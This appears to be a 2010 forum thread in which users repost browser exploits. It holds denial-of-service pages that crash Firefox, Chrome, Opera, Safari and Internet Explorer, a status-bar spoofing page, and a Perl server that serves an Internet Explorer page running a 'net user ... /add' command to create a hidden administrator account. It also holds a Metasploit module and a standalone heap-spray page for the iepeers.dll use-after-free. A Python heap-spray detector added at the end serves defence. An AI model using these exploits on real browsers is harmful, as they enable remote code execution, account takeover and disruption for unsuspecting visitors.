Browser vulnerabilities

Discussion in 'Песочница' started by 547, 23 Mar 2010.

  1. 547

    Firefox 3.5 unicode stack overflow. Andrew Haynes, Simon Berry-Byrne

    Code:
    <html>
    <head>
    <script language="JavaScript" type="Text/Javascript">
    	var str = unescape("%u4141%u4141");
    	var str2 = unescape("");
    	var finalstr2 = mul8(str2, 49000000);
    	var finalstr = mul8(str,   21000000);
    
    
    document.write(finalstr2); 
    document.write(finalstr); 
    
    function mul8 (str, num) {
    	var	i = Math.ceil(Math.log(num) / Math.LN2),
    		res = str;
    	do {
    		res += res;
    	} while (0 < --i);
    	return res.slice(0, str.length * num);
    }
    </script>
    </head>
    <body>
    </body>
    </html>
    <html><body></body></html>
    
    # milw0rm.com [2009-07-15]
    Added 12 minutes later
    Mozilla Firefox 3.6 (Multitudinous looping) Denial of Service Exploit
    Code:
    # EDB-ID: 11432
    # CVE-ID: ()
    # OSVDB-ID: ()
    # Author: Asheesh kumar Mani Tripathi
    # Published: 2010-02-13
    # Verified: yes
                         =======================================================================
     
                          Mozilla Firefox 3.6 (Multitudinous looping) Denial of Service Exploit
                         =======================================================================
     
                                                         by
     
                                                Asheesh Kumar Mani Tripathi
     
     
    # code by Asheesh kumar Mani Tripathi
     
    # email [email protected]
     
    # company       aksitservices
     
    # Credit by Asheesh Anaconda
     
     
    #Download www.mozilla.com/firefox
     
     
    #Background
     
    Mozilla Firefox is a popular internet browser. .....:)
     
    #Vulnerability
    This bug is a typical result of a multitudinous loop.
    The flaw exists when the attacker puts the window.printer() function
    in a multitudinous loop. User interaction is required to
    exploit this vulnerability in that the target must visit a malicious
    web page.
     
     
    #Impact
    Browser doesn't respond any longer to any user input, all tabs are no
    longer accessible, your work, if any, might be lost.
     
     
     
    #Proof of concept
    copy the code in text file and save as "asheesh.html" open in Mozilla Firefox
     
    ========================================================================================================================
     
                                                               asheesh.html
    ========================================================================================================================
     
    <html>
    <title>asheesh kumar mani tripathi</title>
     
    <script>
     
     
    function
    asheesh()
    {
    window.onerror=new Function("history.go(0)");
    window.print();
    asheesh();
     
     
    }
    asheesh();
    </script>
     
    </html>
                                                                
    ========================================================================================================================
     
     
    #If you have any questions, comments, or concerns, feel free to contact me.
    Added 42 minutes later
    Mozilla Firefox <= 3.6 Denial Of Service Exploit
    Code:
    # EDB-ID: 11590
    # CVE-ID: ()
    # OSVDB-ID: ()
    # Author: Ale46
    # Published: 2010-02-27
    # Verified: yes
    <?php
     
    /*
    *    Title: Mozilla Firefox <=3.6 - Remote Denial Of Service Exploit
    *    Date: 25/02/10
    *    Author: Ale46 - ale46[at]paranoici[dot]org
    *    Software Link: http://www.mozilla-europe.org/en/firefox/
    *    Version: 3.6 and 3.5.8 are vulnerable so I think that all versions <= 3.6 have the same issue
    *    Tested on: Windows 7 x32\x64 - Ubuntu 9.10 x32
    *    Description: visiting this php page you'll get an instant crash of Firefox
    *    Greetz: Gandalf
    *    Extra Greetz: University of Palermo and its fantastics rules for the Computer Engineering degree (how beautiful 's irony)
    */
     
    $a = '<marquee>';
    $b = '</marquee>';
     
    for ($i=0;$i<=1000;$i++){
        $a .= '<marquee>';
        $b .= '</marquee>';
    }
     
    echo '<body>';
    echo $a;
    echo "hadouken!";
    echo $b;
    echo '</body>';
     
    ?>
    Opera 10.10 Status Bar Obfuscation
    Code:
    <center><h1>Opera 10.10 Status Bar Obfuscation</h1>
    <br>
    <strong>Author : 599eme Man.<br >
    Contact : [email protected]</strong><br >
    _______________________________________________________________________
    <br>
    <br>
    <br>
     
    Click on google (look the Status bar) and you'll be redirect on Yahoo<br><strong><h1><a onclick="javascript:OB();" href="http://www.Google.com">http://www.Google.com</a></h1></strong></center>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
    <br>
                               <font style="font-family:arial;font-size:32px">Look Here<br>
                       | <br>
                      V
     
    <script>
     
    function OB() {
     
    document.write('');
    document.location='http://yahoo.com';
     
    }
     
    </script>
     
    #1 547, 23 Mar 2010
  2. lzr

    Cross Site URL Hijacking by using Error Object in Mozilla Firefox

    XSUH attacks are used to steal the URL of another website. That URL can reveal the client's status on that site, and it may contain sensitive information such as a session identifier and the like.

    As you know, error-handling scripts in Mozilla Firefox are very useful for developers: they can show the exact source of an error and other useful information. Now this feature can be used to steal the URL after a redirect (an XSUH attack), which can lead to leakage of confidential information.

    The attack technique itself is described here [eng]

    A small example

    Tested on Mozilla Firefox 3.6.3, 3.5.9, 3.6.4 build 5 (26.05.2010).

    ===================================
    All browsers 0day Crash Exploit (2)
    ===================================


    Code:
    <html>
    <head>
    <meta http-equiv="Refresh" content="999999999999999999999999999999999999">
    <title>Crasher</title></head>
    <html>
    <body bgcolor="black">
    <center>
    <font color="red">
    <br>
    <br>
    <br>
    <br>
    <script language="javascript">
    now=new Date();
    document.write(now+"<br>");
    h=now.getHours();
    m=now.getMinutes();
    s=now.getSeconds();
    document.write("<font size='+5'>");
    for (i =0;i<99999999999999999;i++) {
    document.write('<html><marquee><h1>'+h+":"+m+":"+s);
    }
    alert('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa')
    </script>
    </center>
    </font>
    </body>
    </html>
     
    #2 lzr, 28 May 2010
  3. lzr

    ======================================================================
    Google Chrome 4.1.249.1064 Remote Memory Corrupt (Local Crash Exploit)
    ======================================================================

    Save this script with extension .html or .htm
    Then open with Google Chrome web browser

    THIS IS FOR EDUCATIONAL PURPOSES ONLY
    AUTHOR WILL NOT BE RESPONSIBLE FOR ANY DAMAGE

    Webpage display issues: "Aw, Snap!"
    Issue: You may see the "Aw, Snap!" message if a webpage crashes unexpectedly.

    Tested on: WINXP (sp2 - sp3) - WIN 7
    Affected: Google Chrome version 4.1.249.1064 and Prior

    Author: eidelweiss
    Contact: eidelweiss[at]cyberservices[dot]com OR g1xsystem[at]windowslive.com
    Greets: [D]eal [c]yber and All Indonesian Hacker`s


    Code:
    <body onload="javascript:DoS();"></body>
     
    <script>
     
    function DoS() {
     
    var buffer = '\x41';
    for (i =0;i<666;i++) {
    buffer+=buffer+'\x41';
    document.write('<html><marquee><h1>'+buffer+buffer);
    }
     
    }
     
    </script>
    ===================================================
    Google Chrome acronym tag denial of service exploit
    ===================================================

    Code:
    <html>
    <title>Google Chrome remote stack overflow in chrome.dll; published at http://h.ackack.net; found by: Jelmer de Hen</title>
    <head>
    <script>
    // Open it a couple of times, it might not always work; see http://h.ackack.net/?p=323 for more information
    function pataboom(){
    	while(1){
    		document.write("<acronym>");
    	}
    }
    </script>
    </head>
    <body onload="pataboom();"></body>
    </html>
    ==============================================================
    Safari 4.0.5 and Internet Explorer 6.0 / 8.0 Denial of Service
    ==============================================================

    Code:
    <?php
    # Canvas tag DoS Mozilla firefox 3.6.3
    # Canvas tag DoS Safari 4.0.5 (TESTED)
    # Canvas tag DoS Google Chrome 4.1
    # Canvas tag DoS Opera 10.52
    # Canvas tag DoS Internet Explorer 6.0 & 8.0 (TESTED)
    #
    # Found by Jelmer de Hen
    # published at http://h.ackack.net/?p=269
    # OS: Windows XP SP3
    # Mozilla Firefox 3.6.3
    
    echo "<html><body>";
    while (1){
    	echo "<canvas>";
    }
    echo "</body>";
    echo "</html>";
    ?>
    Multiple Browsers Audio Tag Denial of Service Vulnerability
    Code:
    #!/usr/bin/env python3

    # Multiple Browsers Audio Tag Denial of Service Vulnerability
    # any ogg file can be used for the DoS as long as it is a valid file on the server
    # crash reporter for Mac seems to think this is a EXEC_BAD_ACCESS
    # This script acts as a web server to DoS connecting clients

    # Exploit Title: Multiple Browsers Audio Tag DoS Vulnerability
    # Date: April 21th, 2010
    # Author: Chase Higgins, http://twitter.com/tzDev
    # Software Link: google.com/chrome, apple.com/safari
    # Version: Google Chrome 5.0.375.9 dev
    # Tested on: Mac OSX 10.5.8

    import socket

    def main():
        # One page containing 10000 <audio> tags that all reference the same ogg file
        html = """
        <html>
        <body>
        """
        html += "<audio src='myogg.ogg'>" * 10000
        html += """
        </body>
        </html>
        """

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(('', 2121))
        s.listen(1)

        # Hand the same page to every client that connects, then drop the connection
        while True:
            channel, details = s.accept()
            print(channel.recv(256))
            channel.send(html.encode())
            channel.close()

    main()
     
  4. lzr

    Internet Explorer (6/7) Remote Code Execution - Remote User Add Exploit

    Code:
    #!/usr/bin/perl 
       
    use strict; 
    use Socket; 
    use IO::Socket; 
    print "\n"; 
    print "800008                           8                      \n"; 
    print "8      e  eeeee eeeeeee eeeee    8     eeeee eeeee  eeeee\n"; 
    print "8eeeee 8  8  88 8  8  8 8   8    8e    8   8 8   8  8   | \n"; 
    print "    88 8e 8   8 8e 8  8 8eee8    88    8eee8 8eee8e 8eeee \n"; 
    print "e   88 88 8   8 88 8  8 88  8    88    88  8 88   8    88 \n"; 
    print "8eee88 88 8eee8 88 8  8 88  8    88eee 88  8 88eee8 8ee88 \n"; 
    print "-----------------------------------------------------------\n"; 
    print " Usage : $0 Port \n"; 
    print " Please Read the Instruction before you use this \n"; 
    print " ---------------------------------\n"; 
       
    sub parse_form { 
        my $data = $_[0]; 
        my %data; 
        foreach (split /&/, $data) { 
            my ($key, $val) = split /=/; 
            $val =~ s/\+/ /g; 
            $val =~ s/%(..)/chr(hex($1))/eg; 
            $data{$key} = $val;} 
        return %data; } 
       
    my $port = shift; 
    defined($port) or die "Usage: $0 Port \n"; 
    mkdir("public_html", 0777) || print $!; 
    my $DOCUMENT_ROOT = $ENV{'HOME'} . "/public_html"; 
       
    print " [+] Account Name : "; chomp(my $acc=<STDIN>); 
    print " [+] Account Password : "; chomp(my $pass=<STDIN>); 
    print " [+] Your IP : "; chomp (my $ip=<STDIN>); 
    #------------- Exploit ----------------- 
    my $iexplt= "public_html/index.html"; 
     open (myfile, ">>$iexplt"); 
        print myfile "<html>\n"; 
        print myfile "<title> IE User Add Test </title>\n"; 
        print myfile "<head>"; 
        print myfile "</font></b></p>\n"; 
        print myfile "<p>\n"; 
        print myfile "<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='exploit'\n"; 
        print myfile  "></object>\n"; 
        print myfile  "<script language='vbscript'>\n"; 
        print myfile  "adduser="; 
        print myfile '"cmd'; 
        print myfile " /c net user $acc $pass /add && net localgroup Administrators $acc "; 
        print myfile '/add"'; 
        print myfile "\n"; 
        print myfile "exploit.run adduser \n"; 
        print myfile "\n </script></p>\n"; 
        print " [+] ----------------------------------------\n"; 
        print " [-] Link Generated : http://$ip:$port/index.html\n"; 
            close (myfile); 
    #------------------------------------ 
       
    my $server = new IO::Socket::INET(Proto => 'tcp', 
                                      LocalPort => $port, 
                                      Listen => SOMAXCONN, 
                                      Reuse => 1); 
    $server or die "Unable to create server socket: $!" ; 
       
    while (my $client = $server->accept()) { 
        $client->autoflush(1); 
        my %request = (); 
        my %data; 
       
        { 
       
            local $/ = Socket::CRLF; 
            while (<$client>) { 
                chomp; 
                if (/\s*(\w+)\s*([^\s]+)\s*HTTP\/(\d.\d)/) { 
                    $request{METHOD} = uc $1; 
                    $request{URL} = $2; 
                    $request{HTTP_VERSION} = $3; 
                } 
                elsif (/:/) { 
                    (my $type, my $val) = split /:/, $_, 2; 
                    $type =~ s/^\s+//; 
                    foreach ($type, $val) { 
                             s/^\s+//; 
                             s/\s+$//; 
                    } 
                    $request{lc $type} = $val; 
                } 
                elsif (/^$/) { 
                    read($client, $request{CONTENT}, $request{'content-length'}) 
                        if defined $request{'content-length'}; 
                    last; 
                } 
            } 
        } 
       
       
        if ($request{METHOD} eq 'GET') { 
            if ($request{URL} =~ /(.*)\?(.*)/) { 
                    $request{URL} = $1; 
                    $request{CONTENT} = $2; 
                    %data = parse_form($request{CONTENT}); 
            } else { 
                    %data = (); 
            } 
            $data{"_method"} = "GET"; 
        } elsif ($request{METHOD} eq 'POST') { 
                    %data = parse_form($request{CONTENT}); 
                    $data{"_method"} = "POST"; 
        } else { 
            $data{"_method"} = "ERROR"; 
        } 
       
       
            my $localfile = $DOCUMENT_ROOT.$request{URL}; 
       
       
            if (open(FILE, "<$localfile")) { 
                print $client "HTTP/1.0 200 OK", Socket::CRLF; 
                print $client "Content-type: text/html", Socket::CRLF; 
                print $client Socket::CRLF; 
                my $buffer; 
                while (read(FILE, $buffer, 4096)) { 
                    print $client $buffer; 
                } 
                $data{"_status"} = "200"; 
            } 
            else { 
                print $client "HTTP/1.0 404 Not Found", Socket::CRLF; 
                print $client Socket::CRLF; 
                print $client "<html><body>404 Not Found</body></html>"; 
                $data{"_status"} = "404"; 
            } 
            close(FILE); 
       
       
            print ($DOCUMENT_ROOT.$request{URL},"\n"); 
            foreach (keys(%data)) { 
                    print ("   $_ = $data{$_}\n"); } 
       
       
        close $client; 
        # Sioma Labs 
        # http://siomalabs.com 
        # Sioma Agent 154 
    }
    
    0-day exploit for Internet Explorer

    description: http://garwarner.blogspot.com/2010/03/microsoft-releases-out-of-band-ie.html

    exploits:

    1
    Code:
    ##
    # $Id: ie_iepeers_pointer.rb 8779 2010-03-11 05:49:14Z hdm $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    ##
    # ie_iepeers_pointer.rb
    #
    # Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
    #
    # Tested successfully on the following platforms:
    #  - Microsoft Internet Explorer 7, Windows Vista SP2
    #  - Microsoft Internet Explorer 7, Windows XP SP3
    #  - Microsoft Internet Explorer 6, Windows XP SP3
    #
    # Exploit found in-the-wild. For additional details:
    # http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
    #
    # Trancer
    # http://www.rec-sec.com
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
        Rank = GoodRanking

        include Msf::Exploit::Remote::HttpServer::HTML

        def initialize(info = {})
            super(update_info(info,
                'Name'           => 'Internet Explorer iepeers.dll Use After Free',
                'Description'    => %q{
                    This module exploits a use-after-free vulnerability within iepeers.dll of
                    Microsoft Internet Explorer versions 6 and 7.

                    NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
                },
                'License'        => MSF_LICENSE,
                'Author'         =>
                    [
                        'unknown',                         # original discovery
                        'Trancer <mtrancer[at]gmail.com>', # metasploit module
                        'jduck'                            # minor cleanups
                    ],
                'Version'        => '$Revision: 8779 $',
                'References'     =>
                    [
                        [ 'CVE', '2010-0806' ],
                        [ 'OSVDB', '62810' ],
                        [ 'BID', '38615' ],
                        [ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],
                        [ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ]
                    ],
                'DefaultOptions' =>
                    {
                        'EXITFUNC' => 'process',
                        'InitialAutoRunScript' => 'migrate -f',
                    },
                'Payload'        =>
                    {
                        'Space'         => 1024,
                        'BadChars'      => "\x00\x09\x0a\x0d'\\",
                        'StackAdjustment' => -3500,
                    },
                'Platform'       => 'win',
                'Targets'        =>
                    [
                        [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]
                    ],
                'DisclosureDate' => 'Mar 09 2010',
                'DefaultTarget'  => 0))
        end

        def on_request_uri(cli, request)

            # Re-generate the payload
            return if ((p = regenerate_payload(cli)) == nil)

            # Encode the shellcode
            shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

            # Set the return\nops
            ret       = Rex::Text.to_unescape([target.ret].pack('V'))

            # Randomize the javascript variable names
            j_shellcode  = rand_text_alpha(rand(100) + 1)
            j_nops       = rand_text_alpha(rand(100) + 1)
            j_slackspace = rand_text_alpha(rand(100) + 1)
            j_fillblock  = rand_text_alpha(rand(100) + 1)
            j_memory     = rand_text_alpha(rand(100) + 1)
            j_counter    = rand_text_alpha(rand(30) + 2)
            j_ret        = rand_text_alpha(rand(100) + 1)
            j_array      = rand_text_alpha(rand(100) + 1)
            j_function1  = rand_text_alpha(rand(100) + 1)
            j_function2  = rand_text_alpha(rand(100) + 1)
            j_object     = rand_text_alpha(rand(100) + 1)
            j_id         = rand_text_alpha(rand(100) + 1)

            # Build out the message
            html = %Q|<html><body>
    <button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>
    <script language='javascript'>
    function #{j_function1}(){
     var #{j_shellcode} = unescape('#{shellcode}');
     #{j_memory} = new Array();
     var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
     var #{j_nops} = unescape('#{ret}');
     while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
     var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
     delete #{j_nops};
     for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
      #{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
     }
    }
    function #{j_function2}(){
     #{j_function1}();
     var #{j_object} = document.createElement('body');
     #{j_object}.addBehavior('#default#userData');
     document.appendChild(#{j_object});
     try {
      for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {
            #{j_object}.setAttribute('s',window);
      }
     } catch(e){ }
     window.status+='';
    }

    document.getElementById('#{j_id}').onclick();
    </script></body></html>
    |

            print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

            # Transmit the compressed response to the client
            send_response(cli, html, { 'Content-Type' => 'text/html' })

            # Handle the payload
            handler(cli)

        end

    end
    2
    Code:
    <html>
    <body>
    <button id="helloworld" onclick="blkjbdkjb();" STYLE="DISPLAY:NONE"></button>
    <script language="JavaScript" src="bypasskav.txt">
    </script>
    <script language="JavaScript">
    function eejeefe() {
    var s=unescape("%u0c0c");
    var u=unescape("%u0c0c");
    var c=s+u;var array = new Array();
    var ls = 0x86000-(c.length*2);
    var b = unescape("%u0c0c%u0c0C");
    while(b.length<ls/2){b+=b;
    }
    var lh = b.substring(0,ls/2);
    delete b;for(i=0;i<270;i++) {
    array[i] = lh + lh + c;
    }
    }
    function blkjbdkjb() {
    eejeefe();
    var sdfsfsdf = document.createElement("BODY");
    sdfsfsdf.addBehavior("#default#userData");
    document.appendChild(sdfsfsdf);
    try {
    for (i=0;i<10;i++) {
    sdfsfsdf.setAttribute('s',window);
    }
    }
    catch(e) {}
    window.status+='';
    }
    document.getElementById("helloworld").onclick();
    </script>
    </body>
    </html>
    3
    Code:
    # Title: Microsoft Internet Explorer iepeers.dll Use-After-Free Exploit (meta)
    # EDB-ID: 11683
    # CVE-ID: ()
    # OSVDB-ID: ()
    # Author: Trancer
    # Published: 2010-03-10
    # Verified: yes
    
    ##
    # ie_iepeers_pointer.rb
    #
    # Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
    #
    # Tested successfully on the following platforms:
    #  - Microsoft Internet Explorer 7, Windows Vista SP2
    #  - Microsoft Internet Explorer 7, Windows XP SP3
    #  - Microsoft Internet Explorer 6, Windows XP SP3
    #
    # Exploit found in-the-wild. For additional details:
    # http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
    #
    # Trancer
    # http://www.rec-sec.com
    ##
     
    require 'msf/core'
     
    class Metasploit3 < Msf::Exploit::Remote
        Rank = GoodRanking
     
        include Msf::Exploit::Remote::HttpServer::HTML
     
        def initialize(info = {})
            super(update_info(info,
                'Name'           => 'Microsoft Internet Explorer iepeers.dll use-after-free',
                'Description'    => %q{
                    This module exploits a use-after-free vulnerability within iepeers.dll of 
                    Microsoft Internet Explorer versions 6 and 7.
                     
                    NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
                },
                'License'        => MSF_LICENSE,
                'Author'         => [ 
                            'Trancer <mtrancer[at]gmail.com>'
                            ], 
                'Version'        => '$Revision:$',
                'References'     =>
                    [
                        [ 'CVE', '2010-0806' ],
                        [ 'OSVDB', '62810' ],
                        [ 'BID', '38615' ],
                        [ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],
                        [ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ]
                    ],
                'DefaultOptions' =>
                    {
                        'EXITFUNC' => 'process',
                        'InitialAutoRunScript' => 'migrate -f',
                    },
                'Payload'        =>
                    {
                        'Space'         => 1024,
                        'BadChars'      => "\x00\x09\x0a\x0d'\\",    
                        'StackAdjustment' => -3500,
                    },
                'Platform'       => 'win',
                'Targets'        =>
                    [
                        [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]    
                    ],
                'DisclosureDate' => 'Mar 09 2010',
                'DefaultTarget'  => 0))
        end
     
        def on_request_uri(cli, request)
             
            # Re-generate the payload
            return if ((p = regenerate_payload(cli)) == nil)
     
            # Encode the shellcode
            shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
     
            # Set the return\nops
            ret       = Rex::Text.to_unescape([target.ret].pack('V'))
     
            # Randomize the javascript variable names
            j_shellcode  = rand_text_alpha(rand(100) + 1)
            j_nops       = rand_text_alpha(rand(100) + 1)
            j_slackspace = rand_text_alpha(rand(100) + 1)
            j_fillblock  = rand_text_alpha(rand(100) + 1)
            j_memory     = rand_text_alpha(rand(100) + 1)
            j_counter    = rand_text_alpha(rand(30) + 2)
            j_ret        = rand_text_alpha(rand(100) + 1)
            j_array      = rand_text_alpha(rand(100) + 1)
            j_function1  = rand_text_alpha(rand(100) + 1)
            j_function2  = rand_text_alpha(rand(100) + 1)
            j_object     = rand_text_alpha(rand(100) + 1)
            j_id         = rand_text_alpha(rand(100) + 1)
     
            # Build out the message
            html = %Q|<html><body>
    <button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>
    <script language='javascript'>
    function #{j_function1}(){
        var #{j_shellcode} = unescape('#{shellcode}');
        #{j_memory} = new Array(); 
        var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2); 
        var #{j_nops} = unescape('#{ret}'); 
        while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; } 
        var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2); 
        delete #{j_nops}; 
        for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) { 
            #{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode}; 
        }
    }
    function #{j_function2}(){
        #{j_function1}();    
        var #{j_object} = document.createElement('body');
        #{j_object}.addBehavior('#default#userData');
        document.appendChild(#{j_object});
        try {
            for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) { 
                #{j_object}.setAttribute('s',window);
            }
        } catch(e){ }    
        window.status+='';
    }
     
    document.getElementById('#{j_id}').onclick();
    </script></body></html>|
     
            print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
     
            # Transmit the compressed response to the client
            send_response(cli, html, { 'Content-Type' => 'text/html' })
             
            # Handle the payload
            handler(cli)
     
        end
     
    end
    
    
    
     
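From the defensive side, the iepeers pages in this post have a recognizable shape that survives the variable-name randomization the Metasploit module performs: a %u0c0c address string, a self-doubling string loop, a 0x86000 minus shellcode-length block size, a large array fill, then addBehavior('#default#userData') and setAttribute(..., window). The following is an added example, not code from this thread, from Metasploit or from any of the exploit authors: a small Python scanner that looks for those structural indicators in page content and returns a verdict, run over a constructed sample taken from the second listing above (shellcode removed) and a benign control. The indicator names and the threshold of 100 array elements are assumptions of this example.

```python
import re

# Constructed sample: the core of the IE iepeers heap-spray page posted in
# this thread (listing 2, shellcode omitted), used here only as scanner input.
SPRAY_SAMPLE = r"""
<script language="JavaScript">
function eejeefe() {
var s=unescape("%u0c0c");
var u=unescape("%u0c0c");
var c=s+u;var array = new Array();
var ls = 0x86000-(c.length*2);
var b = unescape("%u0c0c%u0c0C");
while(b.length<ls/2){b+=b;
}
var lh = b.substring(0,ls/2);
delete b;for(i=0;i<270;i++) {
array[i] = lh + lh + c;
}
}
function blkjbdkjb() {
eejeefe();
var sdfsfsdf = document.createElement("BODY");
sdfsfsdf.addBehavior("#default#userData");
document.appendChild(sdfsfsdf);
try { for (i=0;i<10;i++) { sdfsfsdf.setAttribute('s',window); } } catch(e) {}
window.status+='';
}
</script>
"""

# Constructed benign control: ordinary use of the same APIs, no spray shape.
BENIGN_SAMPLE = r"""
<script>
var greeting = unescape("Hello%20World");
var items = new Array();
for (var i = 0; i < 5; i++) { items[i] = greeting + i; }
var el = document.createElement("div");
el.setAttribute('title', greeting);
</script>
"""

FLAGS = re.IGNORECASE

# Each indicator is a structural feature of the posted exploit, not a variable
# name, so the random identifiers the Metasploit module emits do not matter.
INDICATORS = {
    # unescape() of a string built only from the 0x0C0C spray address
    "spray_address_string": re.compile(r"""unescape\(\s*["'](?:%u0c0c)+["']""", FLAGS),
    # while (x.length < n) { x += x; }  -- exponential string growth
    "self_doubling_loop": re.compile(
        r"while\s*\(\s*(\w+)\.length\s*<[^)]*\)\s*\{\s*\1\s*\+=\s*\1\b", FLAGS),
    # 0x86000 - (shellcode.length * 2): block size minus payload length
    "slackspace_arithmetic": re.compile(
        r"0x[0-9a-f]{4,}\s*-\s*\(\s*\w+\.length\s*\*\s*2\s*\)", FLAGS),
    # IE-only userData behavior attached to a freshly created element
    "userdata_behavior": re.compile(
        r"""addBehavior\(\s*["']#default#userData["']\s*\)""", FLAGS),
    # setAttribute(name, window): the trigger used in the posted pages
    "setattribute_window": re.compile(
        r"""setAttribute\(\s*["']\w+["']\s*,\s*window\s*\)""", FLAGS),
}

# for (i = 0; i < N; i++) { arr[i] = ... } with a large N is the spray loop;
# the threshold (an assumption) separates it from small array initialisation.
ARRAY_FILL = re.compile(
    r"for\s*\(\s*(?:var\s+)?\w+\s*=\s*0\s*;\s*\w+\s*<\s*(\d+)\s*;[^)]*\)\s*\{\s*\w+\[\w+\]\s*=",
    FLAGS)
ARRAY_FILL_THRESHOLD = 100


def scan_script(html: str) -> dict:
    """Count heap-spray indicators in HTML/JS text and return a verdict."""
    hits = {name: len(pat.findall(html)) for name, pat in INDICATORS.items()}
    big_loops = [int(n) for n in ARRAY_FILL.findall(html) if int(n) >= ARRAY_FILL_THRESHOLD]
    hits["large_array_fill"] = len(big_loops)

    present = {name for name, count in hits.items() if count}
    spray_core = {"spray_address_string", "self_doubling_loop", "large_array_fill"}
    trigger = {"userdata_behavior", "setattribute_window"}
    if spray_core <= present:
        verdict = "heap_spray+iepeers_trigger" if trigger <= present else "heap_spray"
    elif present:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "hits": hits}


if __name__ == "__main__":
    for label, page in (("spray", SPRAY_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan_script(page))
```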